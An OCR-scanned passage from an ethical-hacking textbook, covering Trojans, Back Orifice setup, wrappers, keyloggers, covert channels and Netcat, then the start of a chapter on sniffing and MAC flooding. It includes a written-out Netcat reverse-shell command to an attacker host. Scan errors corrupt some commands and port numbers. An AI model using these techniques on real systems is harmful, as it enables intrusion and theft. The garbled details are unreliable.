is not an exhtiustive list and there Eire newer variants in existence: Let me rule — A remote access Trojan authored entirely in Delphi; uses TCP port 26(19 7 by default • RECUS — Remoted Encrypted Callback UNIX Backdoor (RECIIB) borrows its name from the UNIX world. This product features RC4 encryption, code injection, and encrypted ICMP communication request. Demonstrates a key trait of Trojan software, small size, as it tips the scale at less than 6 KB. • Phatbot — Capable of stealing personal information including e-mail addresses, credit card numbers, and software licensing codes. Returns this information • to the attacker or requestor using a peer-to-peer (P2P) network. Phatbot also has the ability to terminate many antivirus and software- based firewall products leaving the victim open to secondary attacks. Am it is — Opens up TCP port 275 51 to give the hacker complete control of the victim’s computer. Zombam.B Allows the attacker to use a Web browser to infect a computer. Uses port 8(1 by default, created with a Trojan generation tool known as HTTPRat. Much like Phatbot, it also attempts to terminate various antivirus and firewall processes, ■ Beast — Uses a technique known as DDL (Data Definition Language) injection. Using this technique the Trojan injects itself into an existing process, effectively hiding itself from process viewers. It is harder to detect and harder to eradicate, • Hard disk killer — A Trojan written to destroy a system’s hard drive. When executed it will Eittack a system’s hard drive and wipe the hEird drive in just a few seconds. Going back to something that was discussed in a previous chapter known as the NULL session, this is something we can use to place a Trojan, As you read, the NULL session is a feature of Windows that allows connections under the guise of the anonymous user. With this NULL session a connection can be made to enumerate shares and services on the system for whatever goat the attacker may have, which can be, in this chapter, to install a Trojan. Using a NULL session we will install one of the oldest and most powerful tools for gaining access to systems or performing remote [ulmin titration, Back Orifice (E02K) can be placed on a victim’s system to give the attacker the ability to perform a diverse range of attacks, NOTE Back Orifice is an older Trojan tool that is stopped by any of the major antivirus applications that are in circulation today. CHAPTER 11 Trojans and Backdoors 263 The manufacturer of Buck Oriiice says this about B02K: NOTE “Built upon the phenomenal success of Back Orifice released in August 98, B02K puts network Eidminislrators solidly Back Orifice is billed by the manufacturer as a remote administrator tool, but others will call it a Trojan instead. We will not address or attempt to settle this argument here, but we will treat the tool as a Trojan as it exhibits the behaviors associated with this class of software. back in control. In control of the system, network, registry. passwords, file system, and processes. B02K is a lot like other major file-synchronization and remote control packages that are on the market as commercial products. Except that B02K is smaller, faster, free, and very, very extensible. With the help of the open -source development community, B02K will grow even more powerful. With new plug-ins and features being added all the lime, B02K is an obvious choice for the productive ne t wo r k ad m in is tr a 1 < > r, ” An In-Depth Look at 802K Whether you consider it a Trojan or a “remote administrator tool.” the capabilities of BOK2 are fairly extensive for something of this type. This list of features is adapted from the manufacturer’s Web site: Client Features • Address book style server list • Functionality can be extended via the use of plug-ins. • Multiple simul taneo u s s erver connections • Session logging capability • Native Server Support ■ Key loggingcap ability • Hypertext Transfer Protocol (HTTP) file system browsing and transfer • Microsoft Networking file sharing • Remote registry editing • F ile b row si n g, t ra n sfe r. a n d m a n a gem en t • Plug-in extensibility • Remote upgrading H installation, and un installation • Network redirection of Transfer Control Protocol /Inter net Protocol (TCP /IP) connections • ■ Access console programs such as command shells through Telnet • Multimedia support for audio/video capture, and audio playback • Window’s NT registry passwords and Win9x screen saver password dumping • Process control, start, stop, list • ■ Multiple client connections over any medium • GUI m es sa ge pro m pts 264 PART 2 A Technical Overview of Hacking » Proprietary rile compression • Remote reboot » Domain Name Service (DNS) n ei in e resolution Features Added by Plug-ins • Cryptographically Strong Triple-DES encryption • Re m ote d eskto p wi t h op tion ei 1 m o use and key tao a rd c o n tro I • Drag and drop encrypted file transfers and Explorer-like lilesyslem browsing • Graphical rem ote r eg is try ed i ling • Reliable User datagram protocol (UDP) Eind Internet Control Message Protocol (ICMP) communications protocols • Back Orifice 20(H) (1302K) is a next generation tool that was designed to accept customized, specially designed plug-ins. B02K represents a dangerous tool in the wrong hands. With the software’s ability to be configured to carry out a diverse set of tasks at the attacker’s behest, it can be a devastating tool. B02K consists of two software components in the form of a client and a server. To use the R02.K server, the configuration is as follows: 1. Start the B02K, Wizard and click Next when the Wizard’s splash screen appears. • When prompted by the Wizard, enter the server executable to be edited, • Choose the protocol to run the server communication over. • The typical choice is to use TCP as the protocol due toils inherent robustness. UDP is typically used if a firewall or other security architecture needs to be traversed. 1. After choosing to use TCP to control the B02K server the next screen queries the port number that will be used, Port 80 is generally open, and so it’s the one most often used H but any open port can be used. 1. In the next screen, enter a password that will be used to access the server. Note that passwords can be used but the attacker could choose open authentication that w T ould mean that anyone could access without having to supply credentials of any kind. 1. The server configuration tool is provided with the information the attacker has entered when the W’izard finishes. • The server can then be configured to start when the system starts up. • This will allow the program to restart every lime the system is rebooted, preventing the program from becoming unavailable. 1. Click Save Server to save the changes and commit them to the server. CHAPTER 11 Trojans and Backdoors 265 Once the server is configured it Is now ready to be installed on the victim’s system. No matter how the installation is to tEike place, the only applicEilion that needs to be run on the target system is the B02K executable, Once this application is run, the victim’s system will have the port that was configured previously opened on their system and he ready to accepi input from I b e all ticker In addition the application runs an executable file called I’mgr }2,exe and places it in the Windows system 3 2 folder. Additionally, if you configured the BQ2K executable to run in stealth mode, it wit I not show up in Task Manager as it modifies an existing running process to act as its cover, If stealth was not configured, the application will show up as a Remote Administration Service. Stealth or no stealth, the result is the same: The attacker now has a foothold on the victim’s system. Distribution Methods Configuring and creating Trojans has become very simple; the process of getting them onto the victim’s system is the hard part. In today’s environment users have become much more cautious than previously and generally are less likely to click on attachments and files they are suspicious of. Additionally, most systems include antivirus software that is designed to detect behavior that is the signature of Trojans. Tactics that used to work will not be as successful today. To counter this change, tools are available that can be used to slip a dangerous pay load pas I li victim s defenses. With i he tools discussed briefly in I his seel ion together wit Ji knowledge of how a Trojan works, it is possible for even a novice to create an effective mechanism to deliver a pay load on target. Using Wrappers to Install Trojans One such application to deliver this type of pay load is known as wrappers. Using wrappers, attackers can lake l heir intended pay load and merge it with a harmless executable to create a single executable from the two. At this point, the new executable can be posted in some Location where it is likely to be downloaded. Consider a situation where a would-be attacker downloads an authentic application from a vendor’s Web site and uses wrappers to merge a Trojan (that is, BG2K) into the application before posting it on a newsgroup or other location, Some more advanced wrapper-style programs can even bind together several applications instead of the tw T o mentioned here. What looks harmless to the downloader is actually a “bomb” waiting to go off on the system. When the victim runs the infected software, the in fee tor installs and takes over the system. NOTE This scenario is similar to what can and does happen with software downloaded from so-called J ‘warez’ r sites. In this instance an attacker down toads a legitimate program, embeds a pay load into it, and posts it on file-sharing networks such as SitTorrent. Someone looking to get the new software free instead of paying for a legitimate copy actually gets a nasty surprise. 266 PART 2 A Technical Overview of Hacking Wrappers tend to be one of the tools of choice for script kiddies due to their reltitive ease of use and their overall accessibility. 1 1 tickers in this category find them effective for their purposes. Some of the better-known wrapper programs are the following: • EliteWrap — Elite Wrap isoneofthe most popular wrapping tools available due to its rich feature set that includes the ability to perform redundancy checks on merged files to make sure the process went properly and the ability to check if the software will install as expected. Furthermore the software can even be configured to the point of letting the attacker choose an installation directory for the pay load. Finally* software wrapped with EliteWrap can be configured to install silently without any user interaction, Saran Wrap — A wrapper program specifically designed to work wUh and hide Back Orifice, it can bundle Back Orifice with an existing program into what appears to be a standard “Install Shield” installed program. • Trojan Man — This wrapper merges programs and can encrypt the new package in order to bypass antivirus programs. • Teflon Oil Patch — Another program designed to bind Trojans to a specified file in order to defeat Trojan detection applications • Restorator — An example of an application designed originally with the best of intentions but now used for less than honorable purposes. Has the ability to add • a payload to a package, such as a screen saver, before it is forwarded to the victim. Firekiller 2000 — A tool designed to he used with other applications when wrapped. This application is designed to disable firewall and antivirus software. Programs such as Norton Antivirus and McAfee VirusScan were vulnerable targets prior to being patched, Trojan Construction Kits One of the other tools that have emerged over the past few years is the Trojan construction kit. The purpose of these kits is to assist in the development of new Trojans. The emergence of these kits has made the process of creating Trojans so easy that even those with knowledge equivalent to the average script kiddie can cretite new and dangerous entities without much effort at all. Several of these tools are shown in the following: The Trojan construction kit — One of the best examples of a relatively easy to use, but potentially destructive, tool. This kit is command line based, which may make it a little less accessible to the average per son k but it is nonetheless very capable in the right hands. With a little bit of effort it is possible to build a Trojan that can engage In such destructive behavior as destroying partition tables. Master boot records (MBR)> and hard drives. CHAPTER 11 Trojans and Backdoors Senna Spy — Another Trojan creation kit that is capable of custom options, such as file transfer, executing DOS coin mauds, keyboard control, and list and control processes. Stealth tool — A program used not to create Trojans, but to assist them in hiding. In practice, this tool is used to alter the target file by moving bytes, changing headers splitting files, and combining files. Backdoors Many attackers gain access to their target system through something known as a backdoor. The owner of a system compromised in this way may have no indication that someone else is even using the system. Typically a backdoor when implemented will achieve one or more of three key goals: • Provide the ability to access a system regardless of security measures that an administrator may take to prevent such access • Provide the ability to gain access to a system while keeping a low profile. This would allow an attacker to access a system and circumvent logging and other detective methods. • Provide the ability to access a system with minimal effort in the minimum amount of time. Under the right conditions a backdoor will allow the attacker to gain access to a system without having to “re- hack.” Some common backdoors that are placed on a system are of the following types and purposes: • Password -cracking backdoor — Backdoors of this type rely on an attacker uncov- ering and exploiting weak passwords that have been configured by the system owner. System owners who fail to follow accepted guidelines for making strong passwords become vulnerable to attacks of this type. A password-cracking backdoor in fact may be the first attack an aggressor will attempt as it provides access to a known account. In the event another account was used to crack the password, the system owner may find this account and shut it down: however, ‘.villi tin other account compromised the attacker will still have access. • Root kits — Another type of backdoor thai can be created on a system is caused by attackers replacing existing files on the system with their own versions. Using this technique, an attacker can replace key system files on a computer and therefore alter the behavior of a system at a fundamental level. This type of attack uses a specially designed piece of software known as a rootkit that replaces these files with different versions. Once this process has been carried out. the system will now do something or behave differently than designed and once this is the case getting trustworthy information from a system may be questionable, 268 PART 2 A Technical Overview of Hacking Services Backdoor -Network services art another target for attack tint! modiiication with a backdoor, Understanding how a service runs is important to understanding this attack. When a service runs, as explained previously, the process runs on a port such as 80 or 66 h. Once a service is answering on a port, an attacker can attach to the port and issue commands to the service that has been compromised. There are different ways lor an attacker to get the compromised service on the system, but in all such cases the service installed is one that the attacker has modified and configured for his or her purpose. Process hiding backdoors — An attacker wanting to stay undetected for as long as possible will typically choose to go the extra step of hiding the software he or she is running. Programs such as a compromised service, password cracker sniffers, and rootkils Lire items that an titt acker will want to configure so as to avoid detection and removal. Techniques include renaming a package to the name of a legitimate program or altering other files on a system to prevent them from being detected and running. Once a backdoor is in place, an attacker can access and manipulate the system at will. Covert Communication An item of concern for a security professional is the covert channel and the danger it poses. Covert channels are capable of transferring information using a mechanism that was not designed for the purpose. When a covert channel is in use, information is typically being transferred in the open, but hut (Jen within that information is the information that the sender and receiver wish to keep confidential. The beauty of this process is that unless you are looking for the information that is hidden, you will not be able to find it. Additionally the Trusted Computer System Evaluation Criteria (TCSEC) defines two specific types of covert channels known as timing and storage channels: • Covert storage channels — include all mechanisms or processes that facilitate the direct or Indirect writing of data to a location by one service and the direct or indirect reading of it by another. These types of channels can involve either the direct or Indirect writing to a location (such as a hard disk or flash drive) by one process and the subsequent direct or indirect accessing and reading of the storage location by different process or service. Covert timing channels — Send their information by manipulating resource usage on the system (i.e. memory usage I to send a signal to a listening process. This attack is carried out by passing unauthorized information through the manipulation of the use of system resources (for example, changing the amount of CPU time or memory usage). One process will manipulate system resources in a specific, predefined way and these responses will be interpreted by a second process or service. The term covert channel was coined in 1972 and is defined as “mechanisms not intended for Information transfer of any sort, such as the service program’s effect on system load.” This definition specifically differentiates covert channels from the normal mechanisms used to transfer information. CHAPTER 11 Trojans and Backdoors Tools to exploit covert channels include: ■ Loki — Was originally designed to be a proof of concept on how ICMP tra flic can be used as a covert channel. This tool is used to pass information inside of ICMP echo packets, which can carry a data pay load but typically do not. Since the ability to carry data is there already, bu t not used, this can make an ideal covert channel. • ICMP backdoor — Similar to Loki, but instead of using Ping echo packets it uses Ping replies. 0075hell — Uses ICMP packets to send information, but goes the extra step of formatting the packets so they are normal in size • BOCK — Similar to Loki. but uses ICMP instead • Reverse World Wide Web [WWW} Tunneling Shell — Creates covert channels ih rough lirewalh mul pn.>:kN ny inaseuerLidinj! as normal Wen traf’lie • AckCmd — This program provides a command shell on Windows systems. Covert communication occurs via TCP ACK replies. The Role of Keyloggers Another powerful way of extracting information from a victim’s system is to use a piece of technology known as a key logger. Software in this category is designed to capture and report activity on the system in the form of keyboard usage on a target system. When placed on a system it gives the attacker the ability to monitor all activity on a system and have it reported back to the attacker. Under the right conditions this software can capture passwords* confidential information, and other data. Typically keyloggers are implemented one of two ways: hardware or software. In software- based versions, the device is implemented as a small piece of code that resides in the interface between the operating system and keyboard. The software is typically installed the same way any other Trojan would be bundled with something else find made available to the victim who then installs it and becomes infected, Once the software is installed, the attacker now receives all the information he or she is looking for. ■ZEiB Keyloggers are a sticky situation for companies and other organizations wishing to use them to monitor employee activities. In most, but not all, cases notifications must be made to the user base letting them know that they may be monitored and seeking consent to such. If the company wants to capture illegal or illicit activity notifying the users may make such a task difficult to accomplish. In a few cases installing a keylogger on a system without telling the user of that system that he or she was being monitored compromised a whole case. 270 PART 2 I A Technical Overview of Hacking Some hardware key loggers have become even more advanced in how they are plated on a system. Recent developments in this area have included the ability to embed the keylogger hardware into a keyboard that looks no different from a regular keyboard. A user looking for a device sticking out of the back o1 the system would never find these types of keyloggers as there isn’t anything sticking out of the back of the system. Of course under I he right conditions software-based key loggers can be detected, so an alternative method is available Ln the form of hardware-based methods. Hardware-based keyloggers have the ability to be plugged into a universal serial bus (USB) or PS2 port on a system and monitor the passing signals for keystrokes. What makes hardware key loggers particularly nasty is the fact that they are hard to detect unless you visually scan for them. Consider the fact that most computer users never look at the back of their system and you have a recipe for disaster. Software Some of the keystroke recorders include: • IKS Software Key I agger — A Windows based key logger that runs in the background on a system at a very low level Due to the way this software is designed and runs on a system* it is very hard to detect using most conventional means. The program is designed to run at such a low level that it will not show up in process lists or through normal detection methods. G host Key I ogg er — A not h er W in do ws-b a sed key logger that is d esig ned to run silently in the background on a system much like IKS. The difference between this software and IKS is the ability to record activity to an encrypted log that can be e-mailed to the attacker. Sped or Pro — Designed to capture keystroke activity, e-mail passwords* chat conversations and logs, and instant messages. • FakeGINA — This is an advanced key logger that is very specific in its choice of targets. This software component is designed to capture usernames and passwords from a Windows system, specifically to intercept the communication between the Win logon process and the logon GUI in Windows. Port Redirection One common way to exploit the power of covert channels is to use a process known as port redirection. Port redirection is a process where communications are redirected to different ports than they would normally be destined for. In practice this means traffic that is destined for one system is forwarded to another system. CHAPTER 11 Trojans and Backdoors When a packet is sent to a destination, it must have two things in place, an IP address Eind Ei port number, like so: 192,168.1 l(K):Kt) Or: < i p_ Eid d ress > : < por I n u mbe r > If a packet is destined for a Web server on a system with the address 192.1 68.1.210 it would look like the following: 1. 168.1.210:8(1 This would tell the packet to go to the IP address and access port 80, which, by default, is the port used for the Web server service. As was seen in a previous chapter every system has 65,535 ports that can be accessed by services and used for communications. Some of these ports tend to be used more often than others. For exEimple. HTTP uses port 80 and FTP uses port 21. In practice only those ports that will be used by applications should be available for use. Anything not explicitly in use should be blocked and typically is. This poses a challenge for the hacker, one that can be overcome using the technique of port redirection. Port redirection is made possible by setting up a piece of software to listen on specified ports and when packets are received on these ports, the traffic is sent on to another system. Currently there are a myricid of tools available to do just this very thing, but the one we will look at more closely is Netcat. TABLE 11-2 Options ft r Netcat. SWITCH DESCRIPTION Nc-d Used to detach Netcat from the console Nc -i -p [port] Used to create a simple listening TCP port; adding -u will place it into UDP mode Nc -e [program] Used to redirect stdin/stdout from a program Nc -w [timeout] Used to set a timeout before Netcat automatically quits Program | nc Used to pipe output of program to Netcat Nc | program Used to pipe output of Netcat to program Nc -h Used to display help options Nc -v Used to put Netcat into verbose mode Nc -g or nc -G Used to specify source routing flags Net Used for Telnet negotiation Nc -o [file] Used to hex dump traffic to file Nc -z Used for port scanning 272 PART 2 A Technical Overview of Hacking Netcat is a simple command line utility available for Linux, UNIX, and Windows platforms. Netcat is designed to function by reading information from connections using TCP or [J DP and doing simple port redirection on them as configured. Table 11-2 shows some of the options that can be used with Netcat. Netcat also has a close cousin known as Cryptcat, which adds the ability to encrypt the traffic it sends back and forth between systems. For the purposes of the discussion we will have here in this chapter, we wit I use Netcat Let us take a look at the steps involved to use Netcat to perform port redirection. The first step is for the hacker to set up what is known as a listener on his or her system. This prepares the attacker’s system to receive the information from the victim’s system. To set up a listener, the command would be as follows: alone, but consider using Cryptcat if you want the extra protect Eon that comes with encrypting your communication. nc -v -1 -p SO After this, the attacker would need to execute a command on the victim’s system to redirect the traffic to their system. To accomplish this, the hacker executes the following command from the intended victim’s system: nc -n hatkers_ip 80 -e “cmd. exe ” Once this is entered, the net effect would be that the command shell on the victim s system would be at the attacker’s command prompt ready for input as desired. Of course Netcat has some other capabilities, including pari scanning and placing files on a victim s system , Port scanning can be accomplished using the following command : nc -V -z -Ml IPaddress <staxt port> – <ending port> This command would scan a range of ports as specified. Of course Netcat isn’t the only available tool to do port redirection. Tools such as Data pipe and Fpipe can perform I be same functions albeit in different ways. The hesl v. tiy to blunt the impEiel of Trojans is 1o slop them helut e they become an issue. When you become proactive instead of reactive, you can make management easier. Using all the tools available to you for prevention can make all the difference. Use of the following applications becomes a necessity when protecting a system: Antivirus I laving software in place that actively looks for infections and eradicates them is paramount. Several of the applications mentioned here as Trojans can be thwarted by an antivirus. • Anti-spyware — This software works in concert with other forms of protection looking for suspicious behavior and items such as key loggers. Software Protection CHAPTER 11 Trojans and Backdoors 273 • F i re wa I Is — Slopping communications bet wee n so ft wa re s u ch a s c I ien 1 s an d servers can block attacks quite easily and blunt the effect of Trojans in the event they get on the svstem. • Updates — Updating software and sy stems is a key defensive strategy that can address defects in software such as browsers that can be exploited by attackers. • Education — Knowing is half the battle and educating your users on proper proce- dures and how to prevent infections can yield benefits that other methods cannot. • What do you do if you suspect you are a victim already? Your toolbox already holds a number of tools that can be used to capture the telltale signs of infection. These include the following: • Tas kma nag er — P rov ide d w i t h W indows and used to di splay de tai led information about running processes • Ps — The command equivalent of taskmanager, which is used to disphiy the currently running processes on UNIX/Linux systems • Netstat — Netstat displays active TCP connections, ports on which the computer is listening, Ethernet statistics, the IP routing table. IPv4 statistics, and more. • Tlist — A Windows -based tool used to list currently running processes on local or remote machines • TCPView — A GUI tool by Winternals used to display running processes • ■ Process viewer — A Windows Graphical User Interface (GUI) utility that displays data about running processes • Inzider — Lists processes on a Windows system and the ports each one is listening on, Inzider is useful in locating Trojans that have injected themselves into other processes. NOTE Remember that if you suspect a system is infected or a piece of media is compromised in any way, the tools noted here should not be run from that location. Doing so can mean that the tool you are running may actually be infected or altered in some way to prevent your detecting them. 274 PART 2 A Technical Overview of Hacking CHAPTER SUMMARY This chapter looked at one of the oldest forms of ma 1 ware, known as the Tro)an. ‘J rojajis ;irc software applications that are designed to deliver control of a system to an attacker. By design, Trojans are meant to be installed quickly and stealthily on a victim’s system so as to avoid detection. Once a Trojan is installed successfully on a system, the next step most of them per lor m is to open it backdoor. Backdoors are openings put in place by an attacker to bypass the normal security measures that exist on a system. Once these constructs are in place the attacker has the ability to gain stealthy and unchecked access to a system for any purpose that they intended. Typically, this access is given for the purpose of remote access, but it could be Tor data transfer or other purposes. Working in concert ivilli ll backdoor is something known as u cover! tnid overl channel. A backdoor can be installed by a Trojan that will in turn provide li covert channel that can be used to avoid detection and the stopping of an attack. Covert channels represent mechanisms for transferring information between systems and processes in ways that they were not intended to do. Willi data and information being transmitted over unsupported channels, lhe problem becomes one of li lack of security measures as unsupported channels may not he monitored the same way as supported ones are, if al all. Overt channels are the ways the data is expected to be transferred, but inside these channels an attacker can hide covert channels. KEY CONCEPTS AND TERMS Covert channels Master boot records (MBR) Trojan construction kit Trusted Computer System Overt channels Port redirection Evaluation Criteria (TCSEC) Universal serial bus (USB) PS2 CHAPTER 11 Trojans and Backdoors 275 CHAPTER 11 ASSESSMENT 1. Trojans arc a type of malware. A. True B. False 1. Covert channels work over A, known channels B, wireless C, networks D, security controls 1. Which of the following is one of the goals of Trojans? A, Send data B, Change system settings C, Open overt channels D, (live remote access 1. Backdoors are an example of covert channels, A. True B. False 1. are methods for transferring data in an tin monitored manner. 1. Backdoors on a system can be used to bypass firewalls and other protective measures. A. True B, False 1. Trojans can be used to open backdoors on a system, A. True B. False fi. Trojans are designed to be small and stealthy in order to: A. Bypass covert channels B. Bypass firewalls C. Bypass permissions 11 Bypass detection CHAPTER Sniffers, Session Hijacking, and Denial of Service Attacks THIS CHAPTER FOCUSES ON three broad types of network attacks: sniffers, session hijacking, and denial of service (DoS) attacks. Each of these is a dangerous too! in the hands of a skilled attacker, so you must have a thorough understanding of each one. The first discussion in this chapter is on the topic of sniffing, or observing communications on the network in either a passive or an active mode. With sniffing you can see what is being transmitted on the network unprotected and potentially intercept sensitive information to use against the network or system owner. Sniffers are designed to go after and compromise the confidentiality of data as it flows across the network, capturing this data, and putting it in the hands of an unauthorized party. An extension or upgrade to sniffing is the session hijack, which is a more aggressive and powerful weapon in the hacker’s arsenal. A session hijack involves taking over an existing authenticated session and using it to monitor or manipulate the traffic and potentially execute commands on a system remotely. In its most advanced stages, session hijacking directly affects and attacks the integrity of information in an organization. Attackers using this technique can modify information at will as they have the credentials of the victim and whatever they have access to. Denial of service (DoS) is the third type of attack covered in this chapter. It generally involves one computer targeting another, seeking to shut it down and deny legitimate use of its services. A distributed denial of service attack (DDoS) involves hundreds or even thousands of systems seeking to shut down a targeted system or a network. Such large-scale attacks are typically accomplished with the aid of botnets — networks of infected systems conscripted to do hackers’ dirty work for them. 276 Chapter 12 Topics This chapter covers the following topics and concepts: • What sniffers are ■ What session hijacking is • What denial of service (DoS) is • What distributed denial of service (DoS) attacks are • What botnets are • Chapter 12 Goals When you complete this chapter, you will be able to: • Describe the value of sniffers • Describe the purpose of session hijacking • Describe the process of DoS attacks • Describe botnets • List the capabilities of sniffers • Describe the process of session hijacking • Describe the features of a DoS attack Sniffers A sniffer is a vakmble piece of software or a dangerous piece of software, depending on who is using the application. Before getting into a discussion of sniffers , it is necessary to understand what the program actually does. The simple definition of sniffers is that they are an a pp Lie at ion or device that is designed to capture h or “sniff/ 1 network traffic as it moves across the network itself. In the context of this hook, sniffers are a technology used to steal or observe information that you may not otherwise have access to. A sniffer can give an attacker access to a large amount of information, including e-mail passwords. Web passwords, File Transfer Protocol (FTP) credentials, e-mail contents, and transferred files, NOTE Like most technologies,, sniffers are not inherently bad or evil — it all depends on the intent of the user of the technology. Sniffers tn the hands of a network administrator can be used to diagnose network problems and uncover design problems in the network. 277 278 PART 2 A Technical Overview of Hacking Sniffers rely on the inherent insecurity in networks and the protocols that are in use on them. Recall that the Transmission Control Protocol/Internet Protocol (TCP/IP) suite was designed for a more trusting time, and therefore the protocols do not offer much in the way of security. Several protocols lend themselves to easy sniffing: • Telnet — Keystrokes, such as those including usernames and passwords, that can be easily sniffed. Hypertext Transfer Protocol [HTTP) — Designed to send information in the clear without any protection and as such, a good target for sniffing Simple Mail Transfer Protocol (SMTP} — Commonly used in the transfer of e-mail the protocol is simple and efficient, but it does not include any protection against sniffing. Network News Transfer Protocol (NNTP) — All communication is sent in the clear, including passwords and data. • Post Office Protocol (POP) — Designed to retrieve e-mail from servers, but again does not include protection against sniffing as passwords and usernames can be intercepted • File Transfer Protocol (FTP) — A protocol designed to send and receive files; all transmissions are sent in the clear in this protocol, • Internet Message Access Protocol {I MAP) — Similar to SMTP in function and lack of protection • Sniffers are a powerful part of the security professional’s toolkit, offering the ability to peck into the traffic that is on the network and observe the communications that are taking place. How does a sniffer gel this ability? Typically a computer system can see only the communications that are specifically addressed to it or from it. but a sniffer possesses the ability to see ail communications, whether they are addressed to the listening station or not. This ability is made possible by switching the network card into promiscuous mode. Promiscuous mode is the ability of the network card to see all traffic and not just the traffic specifically addressed to it. Of course, the traffic that a station can see varies depending on the network design, as you can’t sniff what you can t see. There are two types of sniffing that can be used to observe traffic: passive and active. Passive sniffing takes place on networks such as those that have a hub as the connectivity device. With a hub in place, all stations are on the same collision domain, so all traffic can be seen by all other stations, In networks that have connectivity hardware that is smarter or more advanced, such as those with a switch, active sniffing is needed. For example, when a switch is in use. if traffic is not destined for a specific port, it isn’t even sent to the port; therefore, there is nothing to observe. In the Open Systems Interconnection (OSI) reference modeL the sniffer functions at the delta link layer. This layer is low in the hierarchy of layers > so not much “intelligence” is present (meaning that little filtering or refinement of the data is occurring), A sniffer CHAPTER 12 Sniffers, Session Hijacking, and Denial of Service Attacks 279 Before sniffing on any network, make sure you have permission from the network owner. Sniffing traffic on networks when you do not have permission to do so on can lead to serious problems up to and including legal repercussions. According to Title IS, Section 2511 of the U.S. Code r which covers electronic crimes including those that would fall under the term ” sniffing,” the act of sniffing would be defined as J ‘ Interception and disclosure of wire, oral, or electronic communications prohibited (a) intentionally intercepts, endeavors to intercept, or procures any other person to intercept or endeavor to intercept, any wire, oral, or electronic communication.” Penalties for engaging in this activity can be anything from fines to civil and criminal penalties. \< able to capture any and aJ] data thai happens u> pas* hv cm ibe wire, which even includes data that would otherwise be hidden by activities occurring at higher layers. Passive Sniffing [pNOTE Understanding the 051 reference model is an essential skill, and you should make sure to spend time reviewing and understanding the model welL Passive sniffing works when the traffic you wish to observe and the station that will do the sniffing are in the same collision domain. Passive sniffing works when a device known as a hub is in use. This is the key feature that makes this setup work- Think of the way a hub functions: traffic that is sent to one port on a hub is automatically sent to all ports on the hub. lie cause any station can transmit at any time, collisions can and do happen and can lead to a collision domain. When this type of situation exists, it is possible to listen in on traffic on the network quite easily because every station shares the same logical transmission area. What thwarts passive sniffing is a switch that separates the networks into multiple collision domains, therefore creating a situation in which stations do not transmit in the same logical area. Basically, passive sniffing is effective when the observer and the victim exist so that each can see each other’s actions. Rfl_J- Sniffing may sound like a formidable threat to the security of information, and it definitely can be, but it can have its impact blunted to a certain degree. The answer is to use encryption for data in transit, specifically data that is of an extra -sensitive nature. The rise in usage of protocols such as Secure Sockets Layer {SSLJ r Internet Protocol Security (IPSec), Secure Shell (SSHJ, and others has made passive sniffing much less effective. Of course, you should always remember that encryption can protect information, but use it only when necessary to avoid overburdening processors on the sending and receiving systems. 2 80 PA RT 2 A Tech n i ea I Overview of H atk i n g The key to getting the most from passive sniffing is to plan carefully. Look for those locations, on the network that will act as chokepoints for traffic, or those locations that the traffic that you are looking for will pass. Placing a sniffer on a collision domain different from the one that is to be observed will not yield the results that you desire, so placement must always he considered. Some points to remember about passive sniffing: » Passive sniffing is difficult to detect because the attacker does not broadcast anything on the network as a practice. • Passive sniffing takes place and is effective when a hub is present. • Passive sniffing can be done very simply. It can be as simple as an attacker plugging into a network hub and loading a sniffer. • Active Sniffing So what happens if a network is broken into different collision domains using the power of switches? It would seem in these situations that the target is out of reach, but this problem can be overcome with the power of active sniffing. Because a switch limits the traffic, a sniffer can see the traffic that is specifically addressed to a system. Active sniffing is necessary to see the traffic that is not addressed to that system. Active sniffing involves sniffing when *) switch is present on the network. This technique is employed in environments where sniffing using passive methods would be ineffectual due to the presence of switches. Active sniffing requires the introduction of traffic onto the network and as such can be delected relatively easily. In order to use active sniffing, an understanding of two techniques is necessary, both of which are used to get around the limitations that switches put in place. These techniques are known as media access control (MAC) Hooding and Address Resolution Protocol (ARP) poisoning, both of which are valuable tools in your arsenal. MAC Flooding The first technique to bypass switches is MAC Hooding: the ability to overwhelm the switch with traffic designed to cause it to fail. A closer look at this attack reveals how it succeeds in its task of causing the switch to fail. Switches contain some ti mount of memory (known as content addressable memory, or CAM I onboard that is used to build what Is called a lookup table, which is then used to track which MAC addresses are present on which ports on the switch. This memory allows a lookup to be performed to let the switch get traffic to the correct port and host as intended. This Lookup table is built by the switch during normal operation and resides in the CAM. The goal of MAC Hooding is to exploit a design defect or oversight in some switches, which is that they have only a limited amount of memory. An attacker can Hood this memory with information in the form of MAC addresses and fill it up quickly until it cannot hold any more infor- mation. In the event that this memory fills up, some switches will enter a fail-open state. CHAPTER 12 Sniffers, Session Hijacking, and Denial of Service Attacks I^fyTj- Both MAC flooding and ARP poisoning generate some level of activity on the network and possibly on the clients themselves. This is the drawback of active sniffing: the introduction of traffic onto the network, and the fact that your presence is now detectable by anyone or anything that may be looking. Passive sniffing has the advantage of being much stealthier, as the presence of the sniffer ss not as obvious due to the lack of broadcast information. When a switch enters I his fail-open state, the switch now becomes functionally a huh, and you are back to where you started with passive sniffing. By performing this attack on a switched network with a vulnerable switch , it is possible to attain a state where traffic that might not otherwise be sniffed now can be. Of course, you don’t get something for nothing; in this case, the amount of traffic that is introduced on the network can make sniffing impossible, as well as send up a huge red ilag to anyone or anything that may be watching for traffic anomalies. MAC Hooding involves overwhelming or flooding the switch with a high volume of requests. This technique overwhelms the memory on the switch used to nrmp MAC addresses to ports. MAC flooding is performed by sending enough traffic through the switch that the memory and switch cannot keep up. Once CAM is overwhelmed, the switch acts like a hub. To make this attack easy there are a diverse set of tools available for the security p rofes sional a n d h ac ke r : • Ether Flood — This utility has the ability to clog a switch and network with Ethernet frames with bogus, randomized hardware addresses. By flooding the network with such frames, the net effect is what is expected with MAC flooding: a switch that fails over to hub behavior. • SMAC — A MAC spoofing utility that is designed to change the MAC address of a system to one that the attacker specifies. In modern operating systems from Windows Xi? forward, and in most Linux variants, this utility is not even necessary because the MAC address can be changed in the graphical user interface (CHI) or at the command line using tools bundled with the operating system (OS) itself. » Macof — Designed to function like CtherFlood and overwhelm the network with bogus or false MAC addresses to cause the switch to fail to hub behavior Technetium MAC Address Changer — Designed to function much like SMAC, in that it can change the MAC address of a system to one the user desires instead 282 PART 2 A Technical Overview of Hacking Address Resolution Protocol (ARP) Poisoning The other method of bypassing a switch to perform sniffing is via Address Resolution Protocol (ARP) poisoning. Mere are some key points: • Address Resolution Protocol (ARP) is a protocol defined at the network layer which is used to resolve an IP address to a physical or MAC address. • In order to locate a physical address, the requesting host will broadcast an ARP request to the network, • The host that has the IP address that is sought after will return its corresponding physical address. • NOTE • ARP resolves Logical addresses to the physical address of an interface. [f you are still unclear about the ARP process, • ARP packets can be spoofed or custom crafted to 